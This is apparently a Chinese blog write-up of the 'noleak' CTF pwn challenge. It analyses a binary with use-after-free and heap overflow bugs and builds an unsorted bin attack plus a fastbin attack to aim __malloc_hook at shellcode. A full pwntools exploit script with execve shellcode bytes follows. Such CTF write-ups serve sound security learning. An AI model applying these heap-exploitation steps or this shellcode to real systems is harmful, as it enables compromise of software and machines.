unsort bin attack -攻防世界 noleak

最新推荐文章于 2022-09-16 14:28:18 发布
最新推荐文章于 2022-09-16 14:28:18 发布
阅读量689 收藏 1
点赞数
分类专栏: pwn题目 文章标签: 安全 web安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/121820126
版权

带着问题的学习是有效的

例题:攻防世界noleak ,这题解法好像有多种但是我是刚接触堆也是抱着学习的姿势学习攻击思路,这里就先例举我看明白的2种方式(爆破(在爆破__malloc_hook文章里面)、unsort bin攻击)

在ida分析后得到以下结果:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rXIQy411-1639030347745)(unsort bin attack.assets/image-20211208214043274.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-T78X37vt-1639030347747)(unsort bin attack.assets/image-20211208214219886.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SU1jBwy4-1639030347748)(unsort bin attack.assets/image-20211208214320212.png)]

总结:

1.用于保存chunk指针的bss数组最多存储10个
2.free时有double free、uaf漏洞
3.可以编辑free chunk数据,有堆溢出漏洞
4.因为程序简单但是因为开了got不可写的措施导致题目有了很多玩法

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-man84Jnf-1639030347750)(unsort bin attack.assets/image-20211208214507601.png)]

没有开NX那么首先当然是shellcode,只要把shellcode放入一个指针处,然后将执行流指向它就可以getshell了

使用unsort bin攻击(最快的方式)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DI1v2lF1-1639030347753)(unsort bin attack.assets/image-20211208221232755.png)]

那么更具它的特性我们来编写exp

#start
add(0x100,'A'*0x100) #为了方便区别这里0x100就是small bin ,0x100是为了填充满chunk这样便于在调试时区分堆空间
add(0x60,'B'*0x100) #1.防止free上个chunk被top吃掉 2.下面要进行fast bin attack
dele(0)
target = 0x601060 #这里需要给上面留出0x8的空间因为fast bin attack需要构造的size位是malloc 第二次才用的上的,为了保证第一次malloc不会破坏size位

#unsort bin attack
payload = p64(0) + p64(target-0x10) #修改bk值
edit(0,len(payload),payload)
add(0x100,p64(0))

那么最后的执行效果如图: 已经成功的写入main_arena+88的地址到了程序用于存放chunk指针的ptr区

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rMJFhDx8-1639030347754)(unsort bin attack.assets/image-20211209114403873.png)]

这里解释下为什么目标地址处要是0x601060给0x601058留了0x8的空位,因为下面我们进行fast bin attack时需要调用malloc2次,那么程序会默认在0x601058处开始进行添加chunk指针,那么那个被修改fd的chunk就会放置0x601058就不会覆盖到main_arena+88的值,从而可以进行正常的构造0x7fsize位的fake chunk

好接下来就是用fast bin的特性将fast chunk放置任意地址处,然后进行任意数据写:

首先将chunk1进行释放就是前面用来隔绝small chunk的fast chunk,此时它会进入到fast bin里面,因为将fast chunk拿出后进对它的size进行判断是否属于该类fast bin的大小范围,反之则会进行报错,fast bin attack攻击特性如图一,报错信息如图二:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gbeCyc1K-1639030347755)(unsort bin attack.assets/image-20211209110939616.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-C2DlNPKW-1639030347756)(unsort bin attack.assets/image-20211209110659461.png)]

那么我们在修改fd指针时就需要对目标地址进行偏移,通过gdb调试可看到一般情况下在目标地址处减去0x3就会把地址的头部分给偏移出来如图所示:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w3DB0d7o-1639030347759)(unsort bin attack.assets/image-20211209111434588.png)]

那么我们将0x601070-0x3设为fast chunk的fd那么就可以绕过检查从而进行fast bin attack攻击,因为这套思路前后联系较紧所以为什么要选0x601070为目标地址后面会讲到 exp如下:

#fast bin attack
dele(1) #将fast chunk放入fast bin
edit(1,0x8,p64(target - 0x3)) #修改fd指向目标地址,malloc2次后即可拿到地址处chunk
add(0x60,p64(0))
add(0x60,'\x00'*0x3 + p64(target) + p64(0x601040))  #此时就拿到了目标地址的data指针 然后即修改buf区的数据

此时的ptr空间如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kBDaOuGm-1639030347760)(unsort bin attack.assets/image-20211209115410992.png)]

那么这里就构造了一个完美rop链条了,接下来就可以通过改变chunk的内容使__malloc_hook指向我们的shellcode了,

  1. 编辑0x601070的chunk覆盖最后一字节为\x10使它变为__malloc_hook , 那么自然的0x601060保存的指针就是 malloc_hook

  2. 然后编辑0x601060的使__malloc_hook指向上面的0x601040(ptr[0])

  3. 编辑0x601040的值为shellcode

exp:

edit(6,1,p8(0x10))
edit(4,0x8,p64(0x601040))
edit(7,len(sh),sh)
raw('end')

上面操作后的内存空间:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bQ1cmpiA-1639030347761)(unsort bin attack.assets/image-20211209120110564.png)]

此时可以看到__malloc_hook已经指向shellcode了,那么就只需要调用malloc就行

最后的完整exp:

# -*-coding:utf-8 -*
from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
#coneext.terminal = ['tmux' , 'splitw', '-h']
SigreturnFrame(kernel = 'amd64')

binary = "./noleak"

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("47.108.195.119","20113")
    e = ELF(binary)
    #libc = ELF(libc_file)

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
u64Leakbase = lambda offset :u64(ru("\x7f")[-6: ] + '\0\0') - offset
u32Leakbase = lambda offset :u32(ru("\xf7")[-4: ]) - offset
it = lambda :p.interactive()


def dbg():
 gdb.attach(p)
 pause()

def success(string,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,addr))
#lg('canary',canary)

def raw(s):
  log.success('当前执行步骤 -> '+s)
  pause()


def add(Size,Data):
    sla('Your choice :','1')
    sla('Size:',str(Size))
    sa('Data:',Data)

def dele(Index):
    sla('Your choice :','2')
    sla('Index:',str(Index))

def edit(Index,Size,Data):
    sla('Your choice :','3')
    sla('Index:',str(Index))
    sla('Size:',str(Size))
    sa('Data:',Data)

sh=b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
ptr = 0x601040  #有uaf漏洞的chunk
malloc_hook_offset = (libc.symbols['__malloc_hook'] & 0xfff) - 0x23 #取最后3位

#start
add(0x100,'A'*0x100) #为了方便区别这里0x100就是small bin ,0x100是为了填充满chunk这样便于在调试时区分堆空间
add(0x60,'B'*0x100) #1.防止free上个chunk被top吃掉 2.下面要进行fast bin attack
dele(0)
target = 0x601060 #这里需要给上面留出0x8的空间因为fast bin attack需要构造的size位是malloc 第二次才用的上的,为了保证第一次malloc不会破坏size位

#unsort bin attack
payload = p64(0) + p64(target-0x10) #修改bk值
edit(0,len(payload),payload)
add(0x100,p64(0))

#fast bin attack
dele(1) #将fast chunk放入fast bin
edit(1,0x8,p64(target - 0x3)) #修改fd指向目标地址,malloc2次后即可拿到地址处chunk
add(0x60,p64(0))
add(0x60,'\x00'*0x3 + p64(target) + p64(ptr))  #此时就拿到了目标地址的data指针 然后即修改buf区的数据

#修改指向值
edit(6,1,p8(0x10))
edit(4,0x8,p64(ptr))
edit(7,len(sh),sh)
raw('end')

sla('Your choice :','1')
sla('Size:',str(1))

it()
HNHuangJingYu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-PWN进阶区-Noleak(XCTF 4th-QCTF-2018)
weixin_44145820的博客
03-01 840
本题主要考察对堆的利用,需要有一定的背景知识,本文也参考了几篇大佬的Writeup,让本文尽可能详细。 题目分析 checksec: 本题的RELRO是完全开启的,意味着我们不能通过修改GOT表来进行攻击 以下是源代码: main函数 delete函数: 这里可以看到free之后没有把指针置空,可能有UAF或者Dubble Free edit函数: 在本函数中,没有检测大小就直接写入,明显...
攻防世界进阶noleak
qq_42728977的博客
04-07 386
题目:XCTF 4th-QCTF-2018 noleak 难度:**** 漏洞点:UAF \unsorted bin sttack\partial write bypass PIE\unlink 参考链接: 伪造堆块绕过unlink检查(ctf-QiangWangCup-2015-shellman) 攻防世界PWN之Noleak(一题学了好多知识)题解 ctfwiki CTF pwn 中最通俗易懂...
攻防世界(pwn)Noleak
PLpa的博客
03-03 1480
前言: 看了大佬们的writeup,发现这题解法真的非常多,我这里用的是unsortedbin的地址写漏洞,详情可以看ctfwiki了解漏洞原因。 没开NX,有可以执行的堆栈,但是开启了Full RELRO,不能修改got表地址了。 打开IDA: 发现是一个菜单题,可以创建,删除,更新堆快信息,没有输出信息的选项,果然Noleak。 我们这里可以一个一个功能去看,看看漏洞存在哪里: 经过观察...
hitcontraining_lab14学习(以及Unsorted Bin的个人理解
a2590035252的博客
09-16 1430
适合和我一样的菜鸡pwner
爆破malloc_hook -攻防世界 noleak
csdn546229768的博客
12-09 526
例题:攻防世界noleak 首先在不用unsort bin的情况下进行攻击,那么我们怎么拿到__malloc_hook的地址呢? 攻击思路:将shellcode放入程序的bss段(0x601020)通过__malloc_hook执行bss中的shellcode,为什么需要爆破呢, 因为我们实际上是获取不到 maloc_hook的地址的只是将它写入到了一个地址处,然后通过fast bin attact 攻击,因为fast bin的fake chunk需要检查size位,既然创造size位,那么libc-2-2
Unsorted Bin Attack
qq_45595732的博客
11-26 416
Unsorted Bin Attack Unsorted Bin Attack 被利用的前提 -------------控制 Unsorted Bin Chunk 的 bk 指针。 Unsorted Bin Attack 可以达到的效果 -------------实现修改任意地址值为一个较大的数值。 Unsorted bin的来源 1,当一个较大的 chunk 被分割成两半后,如果剩下的部分大于MINSIZE,就会被放到 unsorted bin 中。 2,释放一个不属于 fast bin
对于java map类排序
05-10
private static SortedMap, Integer> mapSortByKey(Map, Integer> unsort_map) { TreeMap, Integer> result = new TreeMap, Integer>() Object[] unsort_key = unsort_map.keySet().toArray(); Arrays.sort...
php专用数组排序类ArraySortUtil用法实例
12-18
分享给大家供大家参考。具体如下: ** * ArraySortUtil is a array sort utility, you can extends the sorting engine. * * @version 0.1 ...is_array($unsort) || sizeof($unsort) <= 0 ) r
攻防世界PWN之Noleak(一题学了好多知识)题解
seaaseesa的博客
11-13 3696
Noleak 本题需要用到的知识有:malloc_hook、unsorted bin unlink、fastbin attack、partial write bypass PIE 首先,介绍一下malloc_hook,这是C语言提供的一个用来包装malloc的,类似还有free_hook,具体可以查阅相关资料学习 Malloc hook 我们看如下代码 #include&...
large bin attack & house of strom
seaaseesa的博客
06-12 1059
large bin attack & house of strom large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。 为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。 在free的时
ptmalloc堆内存管理机制(主要讨论Linux x86下32位系统)
xiaobai_aaa的博客
11-16 884
什么是堆? 在用户空间内(32位下为3G的空间),除过禁止访问空间(128M)、代码段、数据段、.bss段、栈、命令行参数及环境变量所占空间之外的空间都可以用做堆区,堆区的空间需要用户动态申请,那就不得不先介绍两个系统调用:brk()或者sbrk()和mmap()。brk()函数的C语言形式声明: void brk ( void end_data_segment); brk()函数的作
ciscn_2019_final_2(合并为unsortbin,doublefree)
m0_51251108的博客
11-02 455
ciscn_2019_final_2: 这题对我来说太难啦,写篇博文好好理理思路,如有错误,还望指正 参考师傅:ha1vk checksec一下 64位,保护全开 逆向分析: 主界面main函数: init函数: Sandbox_Loading()函数: 开了个沙盒,貌似啥都用不了了 allocate()函数: 说错啦,第三行字那里,复制可以帮我们改到size free函数: show函数: byebye函数: 大致思路: 堆利用用劫持_IO_2_1_stdin_结构体,修改文件描述符为66
Libc堆管理机制及漏洞利用技术 (一)
sdulibh的专栏
12-31 2454
0×01 Libc堆浅析 1.1 堆管理结构 struct malloc_state {  mutex_t mutex;                 /* Serialize access. */  int flags;                       /* Flags (formerly in max_fast). */  #if THREAD_STATS  /* Sta
堆漏洞之简单的unlink利用
sunrise的博客
08-09 4236
unlink漏洞(small bin)        当堆块free时,会检查相邻的后面的堆块(地址更小的),或者前面的堆块(地址更大的),是否空闲,如果空闲,那么需要进行堆块合并操作。 空闲的堆块一般以双向链表的形式组织(fast bin是单向链表,此攻击不适用),如果刚刚释放的堆块要与前面或者后面空闲的堆块进行合并操作,那么需要将前或后的堆块从双向链表中摘下来,合并成更大的堆块插入到u...
pwn工具箱之unsorted bin attack
jmp esp
07-03 2768
unsorted bin attack基本信息利用类型:堆利用 堆利用类型:针对unsorted bin的利用,也就是需要用normal chunk或者large chunk释放得到的 利用思想:unsorted bin是一个双链表,在分配时会将unsorted bin中的chunk从unsorted bin中移除,是一个链表的unlink操作。如果能够控制unsorted bin chunk的
libc.2.29漏洞利用及原理
starssgo的博客
03-24 1477
博客地址 还是在csdn里访问方便点。 tcache poisoning 原理 在libc2.27中,由于对tcache缺少充分的检查,导致double frees横行,在libc2.29中对tcache添加了一些东西。 malloc.c->2904行 typedef struct tcache_entry { struct tcache_entry *next; /* This f...
好好说话之Large Bin Attack
hollk’s blog
01-20 4215
large bin attack这种方法本质上并不难,只是有点绕而已。他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不过large chunk还需要考虑fd_nextsize和bk_nextsize这两个结构。接下来就剩Tcache attack和House系列啦!终于要熬出头了???? 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
13.unsorted_bin_attack
06-09 205
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main(){ 5 fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into...
从wiki 重新打基础之 Unsorted Bin Attack
qq_41071646的博客
07-19 370
之所以 看 Unsorted Bin Attack 因为感觉 Fastbin 还有 UAF算是比较熟悉的 所以 直接看 Unsorted Bin 其实Unsorted Bin 也是比较熟悉的 在泄露 libc库的时候就认真的看过 这个东西 ,是当small chunk或large chunkfree掉之后,不会直接进入smallbin或largebin,而是会先进入unsorte...
QueryWrapper.unsort
最新发布
08-11
`QueryWrapper.unsort()` 是一个方法,用于移除查询结果中的排序。调用此方法会返回一个新的 `QueryWrapper` 对象,其中包含原始查询条件但不包含排序。以下是该方法的详细说明: ```python unsort() -> Query...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值